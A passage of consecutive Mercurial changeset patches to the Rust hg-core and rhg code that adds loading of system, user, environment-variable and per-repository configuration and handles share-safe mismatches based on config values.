use crate::errors::{HgError, IoResultExt}; -use crate::utils::files::{ - get_bytes_from_path, get_path_from_bytes, read_whole_file, -}; +use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; use format_bytes::format_bytes; use lazy_static::lazy_static; use regex::bytes::Regex; @@ -244,10 +242,10 @@ new_src: &Path, ) -> (PathBuf, io::Result<Vec<u8>>) { if new_src.is_absolute() { - (new_src.to_path_buf(), read_whole_file(&new_src)) + (new_src.to_path_buf(), std::fs::read(&new_src)) } else { let dir = old_src.parent().unwrap(); let new_src = dir.join(&new_src); - (new_src.to_owned(), read_whole_file(&new_src)) + (new_src.to_owned(), std::fs::read(&new_src)) } } diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -18,7 +18,6 @@ use same_file::is_same_file; use std::borrow::{Cow, ToOwned}; use std::fs::Metadata; -use std::io::Read; use std::iter::FusedIterator; use std::ops::Deref; use std::path::{Path, PathBuf}; @@ -309,17 +308,6 @@ } } -/// Reads a file in one big chunk instead of doing multiple reads -pub fn read_whole_file(filepath: &Path) -> std::io::Result<Vec<u8>> { - let mut file = std::fs::File::open(filepath)?; - let size = file.metadata()?.len(); - - let mut res = vec![0; size as usize]; - file.read_exact(&mut res)?; - - Ok(res) -} - #[cfg(test)] mod tests { use super::*; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612182720 -3600 # Mon Feb 01 13:32:00 2021 +0100 # Node ID 39128182f04e6ddf2918efae55da133e4592de23 # Parent 0d734c0ae1cfa50de9e9b79aaaaf3089d8d37f78 rust: Remove unnecessary check for absolute path before joining `Path::join` does the right thing if its argument is absolute. 
Differential Revision: https://phab.mercurial-scm.org/D9960 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -13,7 +13,6 @@ use lazy_static::lazy_static; use regex::bytes::Regex; use std::collections::HashMap; -use std::io; use std::path::{Path, PathBuf}; lazy_static! { @@ -97,12 +96,16 @@ while let Some((index, bytes)) = lines_iter.next() { if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; - let filename_to_include = get_path_from_bytes(&filename_bytes); - let (include_src, result) = - read_include(&src, &filename_to_include); - let data = result.for_file(filename_to_include)?; + // `Path::parent` only fails for the root directory, + // which `src` can’t be since we’ve managed to open it as a file. + let dir = src + .parent() + .expect("Path::parent fail on a file we’ve read"); + // `Path::join` with an absolute argument correctly ignores the base path + let filename = dir.join(&get_path_from_bytes(&filename_bytes)); + let data = std::fs::read(&filename).for_file(&filename)?; layers.push(current_layer); - layers.extend(Self::parse(&include_src, &data)?); + layers.extend(Self::parse(&filename, &data)?); current_layer = Self::new(ConfigOrigin::File(src.to_owned())); } else if let Some(_) = EMPTY_RE.captures(&bytes) { } else if let Some(m) = SECTION_RE.captures(&bytes) { @@ -234,18 +237,3 @@ fn make_regex(pattern: &'static str) -> Regex { Regex::new(pattern).expect("expected a valid regex") } - -/// Includes are relative to the file they're defined in, unless they're -/// absolute. 
-fn read_include( - old_src: &Path, - new_src: &Path, -) -> (PathBuf, io::Result<Vec<u8>>) { - if new_src.is_absolute() { - (new_src.to_path_buf(), std::fs::read(&new_src)) - } else { - let dir = old_src.parent().unwrap(); - let new_src = dir.join(&new_src); - (new_src.to_owned(), std::fs::read(&new_src)) - } -} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612440981 -3600 # Thu Feb 04 13:16:21 2021 +0100 # Node ID 2845892dd48903f1928ba19aa0da67fb4682851e # Parent 39128182f04e6ddf2918efae55da133e4592de23 rust: Parse system and user configuration CLI `--config` argument parsing is still missing, as is per-repo config Differential Revision: https://phab.mercurial-scm.org/D9961 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -306,6 +306,7 @@ "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", + "home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", @@ -337,6 +338,14 @@ ] [[package]] +name = "home" +version = "0.5.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "humantime" version = "1.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -963,6 +972,7 @@ "checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" "checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = 
"9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" "checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" +"checksum home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654" "checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" "checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" "checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -12,6 +12,7 @@ bytes-cast = "0.1" byteorder = "1.3.4" derive_more = "0.99" +home = "0.5" im-rc = "15.0.*" lazy_static = "1.4.0" memchr = "2.3.3" diff --git a/rust/hg-core/src/config.rs b/rust/hg-core/src/config.rs --- a/rust/hg-core/src/config.rs +++ b/rust/hg-core/src/config.rs @@ -12,3 +12,4 @@ mod config; mod layer; pub use config::Config; +pub use layer::{ConfigError, ConfigParseError}; diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -11,8 +11,11 @@ use crate::config::layer::{ ConfigError, ConfigLayer, ConfigParseError, ConfigValue, }; -use std::path::PathBuf; +use crate::utils::files::get_bytes_from_path; +use std::env; +use std::path::{Path, PathBuf}; +use crate::errors::{HgResultExt, IoResultExt}; use crate::repo::Repo; /// Holds the config values for the current repository @@ -50,6 +53,124 @@ } impl Config { + /// Load system and user configuration from various files. 
+ /// + /// This is also affected by some environment variables. + /// + /// TODO: add a parameter for `--config` CLI arguments + pub fn load() -> Result<Self, ConfigError> { + let mut config = Self { layers: Vec::new() }; + let opt_rc_path = env::var_os("HGRCPATH"); + // HGRCPATH replaces system config + if opt_rc_path.is_none() { + config.add_system_config()? + } + config.add_for_environment_variable("EDITOR", b"ui", b"editor"); + config.add_for_environment_variable("VISUAL", b"ui", b"editor"); + config.add_for_environment_variable("PAGER", b"pager", b"pager"); + // HGRCPATH replaces user config + if opt_rc_path.is_none() { + config.add_user_config()? + } + if let Some(rc_path) = &opt_rc_path { + for path in env::split_paths(rc_path) { + if !path.as_os_str().is_empty() { + if path.is_dir() { + config.add_trusted_dir(&path)? + } else { + config.add_trusted_file(&path)? + } + } + } + } + Ok(config) + } + + fn add_trusted_dir(&mut self, path: &Path) -> Result<(), ConfigError> { + if let Some(entries) = std::fs::read_dir(path) + .for_file(path) + .io_not_found_as_none()? + { + for entry in entries { + let file_path = entry.for_file(path)?.path(); + if file_path.extension() == Some(std::ffi::OsStr::new("rc")) { + self.add_trusted_file(&file_path)? + } + } + } + Ok(()) + } + + fn add_trusted_file(&mut self, path: &Path) -> Result<(), ConfigError> { + if let Some(data) = + std::fs::read(path).for_file(path).io_not_found_as_none()? + { + self.layers.extend(ConfigLayer::parse(path, &data)?) 
+ } + Ok(()) + } + + fn add_for_environment_variable( + &mut self, + var: &str, + section: &[u8], + key: &[u8], + ) { + if let Some(value) = env::var_os(var) { + let origin = layer::ConfigOrigin::Environment(var.into()); + let mut layer = ConfigLayer::new(origin); + layer.add( + section.to_owned(), + key.to_owned(), + // `value` is not a path but this works for any `OsStr`: + get_bytes_from_path(value), + None, + ); + self.layers.push(layer) + } + } + + #[cfg(unix)] // TODO: other platforms + fn add_system_config(&mut self) -> Result<(), ConfigError> { + let mut add_for_prefix = |prefix: &Path| -> Result<(), ConfigError> { + let etc = prefix.join("etc").join("mercurial"); + self.add_trusted_file(&etc.join("hgrc"))?; + self.add_trusted_dir(&etc.join("hgrc.d")) + }; + let root = Path::new("/"); + // TODO: use `std::env::args_os().next().unwrap()` a.k.a. argv[0] + // instead? TODO: can this be a relative path? + let hg = crate::utils::current_exe()?; + // TODO: this order (per-installation then per-system) matches + // `systemrcpath()` in `mercurial/scmposix.py`, but + // `mercurial/helptext/config.txt` suggests it should be reversed + if let Some(installation_prefix) = hg.parent().and_then(Path::parent) { + if installation_prefix != root { + add_for_prefix(&installation_prefix)? + } + } + add_for_prefix(root)?; + Ok(()) + } + + #[cfg(unix)] // TODO: other platforms + fn add_user_config(&mut self) -> Result<(), ConfigError> { + let opt_home = home::home_dir(); + if let Some(home) = &opt_home { + self.add_trusted_file(&home.join(".hgrc"))? + } + let darwin = cfg!(any(target_os = "macos", target_os = "ios")); + if !darwin { + if let Some(config_home) = env::var_os("XDG_CONFIG_HOME") + .map(PathBuf::from) + .or_else(|| opt_home.map(|home| home.join(".config"))) + { + self.add_trusted_file(&config_home.join("hg").join("hgrc"))? + } + } + Ok(()) + } + /// Loads in order, which means that the precedence is the same /// as the order of `sources`.
pub fn load_from_explicit_sources( diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -216,7 +216,7 @@ pub fn to_bytes(&self) -> Vec<u8> { match self { ConfigOrigin::File(p) => get_bytes_from_path(p), - ConfigOrigin::Environment(e) => e.to_owned(), + ConfigOrigin::Environment(e) => format_bytes!(b"${}", e), } } } diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -26,11 +26,13 @@ /// Details about where an I/O error happened #[derive(Debug, derive_more::From)] pub enum IoErrorContext { - /// A filesystem operation returned `std::io::Error` + /// A filesystem operation for the given file #[from] File(std::path::PathBuf), - /// `std::env::current_dir` returned `std::io::Error` + /// `std::env::current_dir` CurrentDir, + /// `std::env::current_exe` + CurrentExe, } impl HgError { @@ -69,6 +71,7 @@ match self { IoErrorContext::File(path) => path.display().fmt(f), IoErrorContext::CurrentDir => f.write_str("current directory"), + IoErrorContext::CurrentExe => f.write_str("current executable"), } } } diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -184,3 +184,10 @@ context: IoErrorContext::CurrentDir, }) } + +pub fn current_exe() -> Result<std::path::PathBuf, HgError> { + std::env::current_exe().map_err(|error| HgError::IoError { + error, + context: IoErrorContext::CurrentExe, + }) +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612441075 -3600 # Thu Feb 04 13:17:55 2021 +0100 # Node ID a6e4e4650bac1e13819b36266083eec36022ca5a # Parent 2845892dd48903f1928ba19aa0da67fb4682851e rhg: Parse system and user configuration at program start … and pass it around up to `Repo::find` Differential Revision: https://phab.mercurial-scm.org/D9962 diff --git 
a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,3 +1,4 @@ +use crate::config::Config; use crate::errors::{HgError, IoResultExt}; use crate::requirements; use crate::utils::files::get_path_from_bytes; @@ -31,7 +32,7 @@ impl Repo { /// Search the current directory and its ancestores for a repository: /// a working directory that contains a `.hg` sub-directory. - pub fn find() -> Result<Self, RepoFindError> { + pub fn find(_config: &Config) -> Result<Self, RepoFindError> { let current_directory = crate::utils::current_dir()?; // ancestors() is inclusive: it first yields `current_directory` as-is. for ancestor in current_directory.ancestors() { diff --git a/rust/rhg/src/commands.rs b/rust/rhg/src/commands.rs --- a/rust/rhg/src/commands.rs +++ b/rust/rhg/src/commands.rs @@ -5,10 +5,11 @@ pub mod root; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; /// The common trait for rhg commands /// /// Normalize the interface of the commands provided by rhg pub trait Command { - fn run(&self, ui: &Ui) -> Result<(), CommandError>; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError>; } diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,6 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; use hg::operations::cat; use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; @@ -29,8 +30,8 @@ impl<'a> Command for CatCommand<'a> { #[timed] - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ 
b/rust/rhg/src/commands/debugdata.rs @@ -1,6 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; @@ -22,8 +23,8 @@ impl<'a> Command for DebugDataCommand<'a> { #[timed] - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; let data = debug_data(&repo, self.rev, self.kind) .map_err(|e| (e, self.rev))?; diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,6 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; use hg::repo::Repo; pub const HELP_TEXT: &str = " @@ -16,8 +17,8 @@ } impl Command for DebugRequirementsCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; let mut output = String::new(); let mut requirements: Vec<_> = repo.requirements().iter().collect(); requirements.sort(); diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,6 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use hg::config::Config; use hg::operations::list_rev_tracked_files; use hg::operations::Dirstate; use hg::repo::Repo; @@ -46,8 +47,8 @@ } impl<'a> Command for FilesCommand<'a> { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; if let Some(rev) = self.rev { let files = 
list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -2,6 +2,7 @@ use crate::error::CommandError; use crate::ui::Ui; use format_bytes::format_bytes; +use hg::config::Config; use hg::repo::Repo; use hg::utils::files::get_bytes_from_path; @@ -20,8 +21,8 @@ } impl Command for RootCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; + fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { + let repo = Repo::find(config)?; let bytes = get_bytes_from_path(repo.working_directory_path()); ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; Ok(()) diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,6 +1,7 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; use format_bytes::format_bytes; +use hg::config::{ConfigError, ConfigParseError}; use hg::errors::HgError; use hg::repo::RepoFindError; use hg::revlog::revlog::RevlogError; @@ -66,6 +67,36 @@ } } +impl From<ConfigError> for CommandError { + fn from(error: ConfigError) -> Self { + match error { + ConfigError::Parse(ConfigParseError { + origin, + line, + bytes, + }) => { + let line_message = if let Some(line_number) = line { + format_bytes!( + b" at line {}", + line_number.to_string().into_bytes() + ) + } else { + Vec::new() + }; + CommandError::Abort { + message: format_bytes!( + b"config parse error in {}{}: '{}'", + origin.to_bytes(), + line_message, + bytes + ), + } + } + ConfigError::Other(error) => error.into(), + } + } +} + impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -123,20 +123,23 @@ matches: ArgMatches, ui: &ui::Ui, ) -> Result<(), 
CommandError> { + let config = hg::config::Config::load()?; + match matches.subcommand() { - ("root", _) => commands::root::RootCommand::new().run(&ui), + ("root", _) => commands::root::RootCommand::new().run(&ui, &config), ("files", Some(matches)) => { - commands::files::FilesCommand::try_from(matches)?.run(&ui) + commands::files::FilesCommand::try_from(matches)?.run(&ui, &config) } ("cat", Some(matches)) => { - commands::cat::CatCommand::try_from(matches)?.run(&ui) + commands::cat::CatCommand::try_from(matches)?.run(&ui, &config) } ("debugdata", Some(matches)) => { - commands::debugdata::DebugDataCommand::try_from(matches)?.run(&ui) + commands::debugdata::DebugDataCommand::try_from(matches)? + .run(&ui, &config) } ("debugrequirements", _) => { commands::debugrequirements::DebugRequirementsCommand::new() - .run(&ui) + .run(&ui, &config) } _ => unreachable!(), // Because of AppSettings::SubcommandRequired, } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612445387 -3600 # Thu Feb 04 14:29:47 2021 +0100 # Node ID f031fe1c6ededaee65a2823ea109daeae49fa4ad # Parent a6e4e4650bac1e13819b36266083eec36022ca5a rhg: Abort based on config on share-safe mismatch Differential Revision: https://phab.mercurial-scm.org/D9963 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -8,7 +8,9 @@ context: IoErrorContext, }, - /// A file under `.hg/` normally only written by Mercurial + /// A file under `.hg/` normally only written by Mercurial is not in the + /// expected format. This indicates a bug in Mercurial, filesystem + /// corruption, or hardware failure. /// /// The given string is a short explanation for users, not intended to be /// machine-readable. @@ -21,6 +23,12 @@ /// The given string is a short explanation for users, not intended to be /// machine-readable. UnsupportedFeature(String), + + /// Operation cannot proceed for some other reason. 
+ /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + Abort(String), } /// Details about where an I/O error happened @@ -46,6 +54,9 @@ pub fn unsupported(explanation: impl Into<String>) -> Self { HgError::UnsupportedFeature(explanation.into()) } + pub fn abort(explanation: impl Into<String>) -> Self { + HgError::Abort(explanation.into()) + } } // TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? @@ -61,6 +72,7 @@ HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) } + HgError::Abort(explanation) => explanation.fmt(f), } } } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -32,12 +32,12 @@ impl Repo { /// Search the current directory and its ancestores for a repository: /// a working directory that contains a `.hg` sub-directory. - pub fn find(_config: &Config) -> Result<Self, RepoFindError> { + pub fn find(config: &Config) -> Result<Self, RepoFindError> { let current_directory = crate::utils::current_dir()?; // ancestors() is inclusive: it first yields `current_directory` as-is. for ancestor in current_directory.ancestors() { if ancestor.join(".hg").is_dir() { - return Ok(Self::new_at_path(ancestor.to_owned())?); + return Ok(Self::new_at_path(ancestor.to_owned(), config)?); } } Err(RepoFindError::NotFoundInCurrentDirectoryOrAncestors { @@ -46,7 +46,10 @@ } /// To be called after checking that `.hg` is a sub-directory - fn new_at_path(working_directory: PathBuf) -> Result<Self, HgError> { + fn new_at_path( + working_directory: PathBuf, + config: &Config, + ) -> Result<Self, HgError> { let dot_hg = working_directory.join(".hg"); let hg_vfs = Vfs { base: &dot_hg }; @@ -95,11 +98,23 @@ requirements::load(Vfs { base: &shared_path })? 
.contains(requirements::SHARESAFE_REQUIREMENT); - // TODO: support for `share.safe-mismatch.*` config if share_safe && !source_is_share_safe { - return Err(HgError::unsupported("share-safe downgrade")); + return Err(match config.get(b"safe-mismatch", b"source-not-safe") { + Some(b"abort") | None => HgError::abort( + "share source does not support share-safe requirement" + ), + _ => HgError::unsupported("share-safe downgrade") + }); } else if source_is_share_safe && !share_safe { - return Err(HgError::unsupported("share-safe upgrade")); + return Err( + match config.get(b"safe-mismatch", b"source-safe") { + Some(b"abort") | None => HgError::abort( + "version mismatch: source uses share-safe \ + functionality while the current share does not", + ), + _ => HgError::unsupported("share-safe upgrade"), + }, + ); } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612447493 -3600 # Thu Feb 04 15:04:53 2021 +0100 # Node ID d7685105e504d6d964b32adc7b11234841e5f54f # Parent f031fe1c6ededaee65a2823ea109daeae49fa4ad rhg: Parse per-repository configuration Differential Revision: https://phab.mercurial-scm.org/D9964 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -16,7 +16,6 @@ use std::path::{Path, PathBuf}; use crate::errors::{HgResultExt, IoResultExt}; -use crate::repo::Repo; /// Holds the config values for the current repository /// TODO update this docstring once we support more sources @@ -196,12 +195,28 @@ Ok(Config { layers }) } - /// Loads the local config. In a future version, this will also load the - /// `$HOME/.hgrc` and more to mirror the Python implementation. - pub fn load_for_repo(repo: &Repo) -> Result<Self, ConfigError> { - Ok(Self::load_from_explicit_sources(vec![ - ConfigSource::AbsPath(repo.hg_vfs().join("hgrc")), - ])?) + /// Loads the per-repository config into a new `Config` which is combined + /// with `self`. 
+ pub(crate) fn combine_with_repo( + &self, + repo_config_files: &[PathBuf], + ) -> Result<Self, ConfigError> { + let (cli_layers, other_layers) = self + .layers + .iter() + .cloned() + .partition(ConfigLayer::is_from_command_line); + + let mut repo_config = Self { + layers: other_layers, + }; + for path in repo_config_files { + // TODO: check if this file should be trusted: + // `mercurial/ui.py:427` + repo_config.add_trusted_file(path)?; + } + repo_config.layers.extend(cli_layers); + Ok(repo_config) } /// Returns an `Err` if the first value found is not a valid boolean. @@ -297,8 +312,6 @@ let config = Config::load_from_explicit_sources(sources) .expect("expected valid config"); - dbg!(&config); - let (_, value) = config.get_inner(b"section", b"item").unwrap(); assert_eq!( value, diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -51,6 +51,15 @@ } } + /// Returns whether this layer comes from `--config` CLI arguments + pub(crate) fn is_from_command_line(&self) -> bool { + if let ConfigOrigin::CommandLine = self.origin { + true + } else { + false + } + } + /// Add an entry to the config, overwriting the old one if already present. pub fn add( &mut self, @@ -97,11 +106,13 @@ if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; // `Path::parent` only fails for the root directory, - // which `src` can’t be since we’ve managed to open it as a file. + // which `src` can’t be since we’ve managed to open it as a + // file. 
let dir = src .parent() .expect("Path::parent fail on a file we’ve read"); - // `Path::join` with an absolute argument correctly ignores the base path + // `Path::join` with an absolute argument correctly ignores the + // base path let filename = dir.join(&get_path_from_bytes(&filename_bytes)); let data = std::fs::read(&filename).for_file(&filename)?; layers.push(current_layer); @@ -200,9 +211,11 @@ #[derive(Clone, Debug)] pub enum ConfigOrigin { - /// The value comes from a configuration file + /// From a configuration file File(PathBuf), - /// The value comes from the environment like `$PAGER` or `$EDITOR` + /// From a `--config` CLI argument + CommandLine, + /// From environment variables like `$PAGER` or `$EDITOR` Environment(Vec<u8>), /* TODO cli * TODO defaults (configitems.py) @@ -216,6 +229,7 @@ pub fn to_bytes(&self) -> Vec<u8> { match self { ConfigOrigin::File(p) => get_bytes_from_path(p), + ConfigOrigin::CommandLine => b"--config".to_vec(), ConfigOrigin::Environment(e) => format_bytes!(b"${}", e), } } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,4 +1,4 @@ -use crate::config::Config; +use crate::config::{Config, ConfigError, ConfigParseError}; use crate::errors::{HgError, IoResultExt}; use crate::requirements; use crate::utils::files::get_path_from_bytes; @@ -12,17 +12,29 @@ dot_hg: PathBuf, store: PathBuf, requirements: HashSet<String>, + config: Config, } #[derive(Debug, derive_more::From)] -pub enum RepoFindError { - NotFoundInCurrentDirectoryOrAncestors { +pub enum RepoError { + NotFound { current_directory: PathBuf, }, #[from] + ConfigParseError(ConfigParseError), + #[from] Other(HgError), } +impl From<ConfigError> for RepoError { + fn from(error: ConfigError) -> Self { + match error { + ConfigError::Parse(error) => error.into(), + ConfigError::Other(error) => error.into(), + } + } +} + /// Filesystem access abstraction for the contents of a given "base" diretory 
#[derive(Clone, Copy)] pub(crate) struct Vfs<'a> { @@ -32,7 +44,7 @@ impl Repo { /// Search the current directory and its ancestores for a repository: /// a working directory that contains a `.hg` sub-directory. - pub fn find(config: &Config) -> Result<Self, RepoFindError> { + pub fn find(config: &Config) -> Result<Self, RepoError> { let current_directory = crate::utils::current_dir()?; // ancestors() is inclusive: it first yields `current_directory` as-is. for ancestor in current_directory.ancestors() { @@ -40,18 +52,20 @@ return Ok(Self::new_at_path(ancestor.to_owned(), config)?); } } - Err(RepoFindError::NotFoundInCurrentDirectoryOrAncestors { - current_directory, - }) + Err(RepoError::NotFound { current_directory }) } /// To be called after checking that `.hg` is a sub-directory fn new_at_path( working_directory: PathBuf, config: &Config, - ) -> Result<Self, HgError> { + ) -> Result<Self, RepoError> { let dot_hg = working_directory.join(".hg"); + let mut repo_config_files = Vec::new(); + repo_config_files.push(dot_hg.join("hgrc")); + repo_config_files.push(dot_hg.join("hgrc-not-shared")); + let hg_vfs = Vfs { base: &dot_hg }; let mut reqs = requirements::load_if_exists(hg_vfs)?; let relative = @@ -89,7 +103,8 @@ return Err(HgError::corrupted(format!( ".hg/sharedpath points to nonexistent directory {}", shared_path.display() - ))); + )) + .into()); } store_path = shared_path.join("store"); @@ -99,12 +114,15 @@ .contains(requirements::SHARESAFE_REQUIREMENT); if share_safe && !source_is_share_safe { - return Err(match config.get(b"safe-mismatch", b"source-not-safe") { + return Err(match config + .get(b"safe-mismatch", b"source-not-safe") + { Some(b"abort") | None => HgError::abort( - "share source does not support share-safe requirement" + "share source does not support share-safe requirement", ), - _ => HgError::unsupported("share-safe downgrade") - }); + _ => HgError::unsupported("share-safe downgrade"), + } + .into()); } else if source_is_share_safe && 
!share_safe { return Err( match config.get(b"safe-mismatch", b"source-safe") { @@ -113,16 +131,24 @@ functionality while the current share does not", ), _ => HgError::unsupported("share-safe upgrade"), - }, + } + .into(), ); } + + if share_safe { + repo_config_files.insert(0, shared_path.join("hgrc")) + } } + let repo_config = config.combine_with_repo(&repo_config_files)?; + let repo = Self { requirements: reqs, working_directory, store: store_path, dot_hg, + config: repo_config, }; requirements::check(&repo)?; @@ -138,6 +164,10 @@ &self.requirements } + pub fn config(&self) -> &Config { + &self.config + } + /// For accessing repository files (in `.hg`), except for the store /// (`.hg/store`). pub(crate) fn hg_vfs(&self) -> Vfs<'_> { diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -3,7 +3,7 @@ use format_bytes::format_bytes; use hg::config::{ConfigError, ConfigParseError}; use hg::errors::HgError; -use hg::repo::RepoFindError; +use hg::repo::RepoError; use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; use std::convert::From; @@ -51,18 +51,17 @@ } } -impl From<RepoFindError> for CommandError { - fn from(error: RepoFindError) -> Self { +impl From<RepoError> for CommandError { + fn from(error: RepoError) -> Self { match error { - RepoFindError::NotFoundInCurrentDirectoryOrAncestors { - current_directory, - } => CommandError::Abort { + RepoError::NotFound { current_directory } => CommandError::Abort { message: format_bytes!( b"no repository found in '{}' (.hg not found)!", get_bytes_from_path(current_directory) ), }, - RepoFindError::Other(error) => error.into(), + RepoError::ConfigParseError(error) => error.into(), + RepoError::Other(error) => error.into(), } } } @@ -70,33 +69,35 @@ impl From<ConfigError> 